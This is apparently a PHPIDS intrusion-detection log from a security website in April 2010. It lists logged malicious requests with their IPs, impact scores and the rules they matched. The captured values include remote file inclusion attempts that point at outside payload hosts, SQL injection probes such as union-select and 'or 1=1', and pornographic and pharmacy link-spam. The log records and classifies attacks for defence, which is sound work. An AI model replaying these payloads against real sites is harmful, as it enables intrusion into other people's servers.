Page:/i.php?page=security/networkprinterhacking%20%20////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122701
Name:REQUEST.page
Value:security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122702
Name:GET.page
Value:security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:46
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122695
Name:REQUEST.page
Value:security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:45
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122696
Name:GET.page
Value:security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
Page:/i.php?page=security////////?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head??
IP:74.50.85.15
Impact:40
Created:2010-04-27 20:53:45
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++:::

ID:122693
Name:REQUEST.codeme
Value:I like it so much, <a href= http://technorati.com/people/pokemonporn#1 >pokemon porn now</a> [url=http://technorati.com/people/pokemonporn#1]pokemon porn now[/url], 3240,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 20:40:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122694
Name:POST.codeme
Value:I like it so much, <a href= http://technorati.com/people/pokemonporn#1 >pokemon porn now</a> [url=http://technorati.com/people/pokemonporn#1]pokemon porn now[/url], 3240,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 20:40:47
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122691
Name:REQUEST.page
Value:security/madmacs-mac-spoofer,<a
Page:/i.php?page=security/madmacs-mac-spoofer,<a
IP:216.155.132.148
Impact:8
Created:2010-04-27 20:02:36
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122692
Name:GET.page
Value:security/madmacs-mac-spoofer,<a
Page:/i.php?page=security/madmacs-mac-spoofer,<a
IP:216.155.132.148
Impact:8
Created:2010-04-27 20:02:36
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122689
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/hping2
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/hping2
IP:118.68.165.114
Impact:20
Created:2010-04-27 18:46:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122690
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/hping2
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/hping2
IP:118.68.165.114
Impact:20
Created:2010-04-27 18:46:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122688
Name:POST.codeme
Value:Great, <a href= http://technorati.com/people/3dporn#1 >Buy 3d porn</a> [url=http://technorati.com/people/3dporn#1]Buy 3d porn[/url], %P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 17:22:53
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122687
Name:REQUEST.codeme
Value:Great, <a href= http://technorati.com/people/3dporn#1 >Buy 3d porn</a> [url=http://technorati.com/people/3dporn#1]Buy 3d porn[/url], %P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 17:22:52
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122685
Name:REQUEST.page
Value:' or 1=1'
Page:/i.php?page=%27%20or%201=1%27
IP:74.86.107.156
Impact:50
Created:2010-04-27 17:15:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122686
Name:GET.page
Value:' or 1=1'
Page:/i.php?page=%27%20or%201=1%27
IP:74.86.107.156
Impact:50
Created:2010-04-27 17:15:38
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122683
Name:REQUEST.page
Value:' or 1=1'
Page:/i.php?page=%27%20or%201=1%27
IP:98.235.76.172
Impact:50
Created:2010-04-27 17:15:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122684
Name:GET.page
Value:' or 1=1'
Page:/i.php?page=%27%20or%201=1%27
IP:98.235.76.172
Impact:50
Created:2010-04-27 17:15:37
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 1/2 | Tags: sqli, id | ID: 48

ID:122681
Name:REQUEST.page
Value:security/hackingillustrated and 0=1 union select
Page:/i.php?page=security/hackingillustrated+and+0=1+union+select+
IP:71.197.58.17
Impact:20
Created:2010-04-27 17:02:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122682
Name:GET.page
Value:security/hackingillustrated and 0=1 union select
Page:/i.php?page=security/hackingillustrated+and+0=1+union+select+
IP:71.197.58.17
Impact:20
Created:2010-04-27 17:02:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122679
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=10534378&CFTOKEN#=45441525#lastvisit={ts '2010-04-27 16:56:20'}#timecreated={ts '2010-04-27 16:56:20'}#hitcount=2#cftoken=45441525#cfid=10534378#
Page:/fed-watch.php
IP:61.135.248.191
Impact:64
Created:2010-04-27 16:54:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122680
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=10534378&CFTOKEN#=45441525#lastvisit={ts '2010-04-27 16:56:20'}#timecreated={ts '2010-04-27 16:56:20'}#hitcount=2#cftoken=45441525#cfid=10534378#
Page:/fed-watch.php
IP:61.135.248.191
Impact:64
Created:2010-04-27 16:54:06
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0833333333333
Converted: ((((+::

ID:122677
Name:REQUEST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/sexonthebeach#1 >sex on the beach</a> [url=http://technorati.com/people/sexonthebeach#1]sex on the beach[/url], %-P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 16:33:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122678
Name:POST.codeme
Value:I bookmarked this guestbook., <a href= http://technorati.com/people/sexonthebeach#1 >sex on the beach</a> [url=http://technorati.com/people/sexonthebeach#1]sex on the beach[/url], %-P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 16:33:42
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122676
Name:GET.page
Value:"
Page:/i.php?page=%22
IP:66.249.67.227
Impact:12
Created:2010-04-27 15:43:09
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122675
Name:REQUEST.page
Value:"
Page:/i.php?page=%22
IP:66.249.67.227
Impact:12
Created:2010-04-27 15:43:08
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:122673
Name:REQUEST.codeme
Value:Only, <a href= http://technorati.com/people/buyphenterminecheapmedicationt#1 >Real buy phentermine cheap medication the prescribing</a> [url=http://technorati.com/people/buyphenterminecheapmedicationt#1]Real buy phentermine cheap medication the prescribing[/url], %-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 14:05:29
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122674
Name:POST.codeme
Value:Only, <a href= http://technorati.com/people/buyphenterminecheapmedicationt#1 >Real buy phentermine cheap medication the prescribing</a> [url=http://technorati.com/people/buyphenterminecheapmedicationt#1]Real buy phentermine cheap medication the prescribing[/url], %-OOO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-04-27 14:05:29
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: ((++::

ID:122671
Name:REQUEST.page
Value:security/madmacs-mac-spoofer,<a
Page:/i.php?page=security/madmacs-mac-spoofer,<a
IP:208.43.167.197
Impact:8
Created:2010-04-27 13:27:55
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122672
Name:GET.page
Value:security/madmacs-mac-spoofer,<a
Page:/i.php?page=security/madmacs-mac-spoofer,<a
IP:208.43.167.197
Impact:8
Created:2010-04-27 13:27:55
Details:
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122669
Name:REQUEST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/whatistheaveragepriceoflifeins >what is the average price of life insurance</a>, [url= http://technorati.com/people/whatistheaveragepriceoflifeins ]what is the average price of life insurance[/url], 682742,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 13:15:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122670
Name:POST.codeme
Value:can you do thi for me, <a href= http://technorati.com/people/whatistheaveragepriceoflifeins >what is the average price of life insurance</a>, [url= http://technorati.com/people/whatistheaveragepriceoflifeins ]what is the average price of life insurance[/url], 682742,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:16
Created:2010-04-27 13:15:58
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33

ID:122667
Name:REQUEST.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:20
Created:2010-04-27 13:11:45
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122668
Name:GET.page
Value:reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:20
Created:2010-04-27 13:11:45
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122663
Name:REQUEST.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:20
Created:2010-04-27 13:06:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122664
Name:REQUEST.mode
Value:print //include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:26
Created:2010-04-27 13:06:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122665
Name:GET.page
Value:reviews//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:20
Created:2010-04-27 13:06:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122666
Name:GET.mode
Value:print //include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
Page:/i.php?page=reviews/chaosnetworks&mode=print%20%20//include/scripts/export_batch.inc.php?DIR=http://pyongwha.org/zeroboard/data/idxx.pdf??
IP:202.131.93.10
Impact:26
Created:2010-04-27 13:06:21
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122661
Name:REQUEST.codeme
Value:really great sites, thank you, <a href= http://technorati.com/people/20inchdick#1 >All about 20 inch dick</a> [url=http://technorati.com/people/20inchdick#1]All about 20 inch dick[/url], >:-P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 09:57:46
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122662
Name:POST.codeme
Value:really great sites, thank you, <a href= http://technorati.com/people/20inchdick#1 >All about 20 inch dick</a> [url=http://technorati.com/people/20inchdick#1]All about 20 inch dick[/url], >:-P,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-27 09:57:46
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122659
Name:REQUEST.codeme
Value:Is it so important?, <a href= http://technorati.com/people/hugecumshot#1 >huge cumshot information</a> [url=http://technorati.com/people/hugecumshot#1]huge cumshot information[/url], 27541,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-27 09:08:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122660
Name:POST.codeme
Value:Is it so important?, <a href= http://technorati.com/people/hugecumshot#1 >huge cumshot information</a> [url=http://technorati.com/people/hugecumshot#1]huge cumshot information[/url], 27541,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-27 09:08:13
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122657
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/networkprinterhacking
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/networkprinterhacking
IP:116.71.59.123
Impact:10
Created:2010-04-27 08:07:35
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122658
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/networkprinterhacking
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/networkprinterhacking
IP:116.71.59.123
Impact:10
Created:2010-04-27 08:07:35
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122655
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/networkprinterhacking
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/networkprinterhacking
IP:116.71.59.123
Impact:10
Created:2010-04-27 08:03:36
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122656
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/networkprinterhacking
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/networkprinterhacking
IP:116.71.59.123
Impact:10
Created:2010-04-27 08:03:36
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:122653
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-27 07:30:26
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122654
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-04-27 07:30:26
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:122649
Name:REQUEST.page
Value:security/ettercapfilter/werbungFrame.php?do=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter/werbungFrame.php?do=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-27 07:26:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122650
Name:GET.page
Value:security/ettercapfilter/werbungFrame.php?do=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/ettercapfilter/werbungFrame.php?do=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-27 07:26:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122651
Name:REQUEST.page
Value:security/werbungFrame.php?do=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/werbungFrame.php?do=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-27 07:26:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122652
Name:GET.page
Value:security/werbungFrame.php?do=http://phamsight.com/docs/images/head??
Page:/i.php?page=security/werbungFrame.php?do=http://phamsight.com/docs/images/head??
IP:222.236.47.182
Impact:20
Created:2010-04-27 07:26:55
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:122647
Name:REQUEST.page
Value:security/networkprinterhacking' and 0=1 union select
Page:/i.php?page=security/networkprinterhacking'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:15:52
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122648
Name:GET.page
Value:security/networkprinterhacking' and 0=1 union select
Page:/i.php?page=security/networkprinterhacking'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:15:52
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122645
Name:REQUEST.page
Value:computerlaws/state-hacking-laws' and 0=1 union select
Page:/i.php?page=computerlaws/state-hacking-laws'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:15:48
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122646
Name:GET.page
Value:computerlaws/state-hacking-laws' and 0=1 union select
Page:/i.php?page=computerlaws/state-hacking-laws'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:15:48
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122643
Name:REQUEST.page
Value:security/networkprinterhacking' and 0=1 union select
Page:/i.php?page=security/networkprinterhacking'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:14:35
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122644
Name:GET.page
Value:security/networkprinterhacking' and 0=1 union select
Page:/i.php?page=security/networkprinterhacking'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:14:35
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122641
Name:REQUEST.page
Value:security/hackingillustrated' and 0=1 union select
Page:/i.php?page=security/hackingillustrated'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:14:22
Details:
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:122642
Name:GET.page
Value:security/hackingillustrated' and 0=1 union select
Page:/i.php?page=security/hackingillustrated'+and+0=1+union+select+
IP:188.139.195.159
Impact:22
Created:2010-04-27 07:14:22
Details:
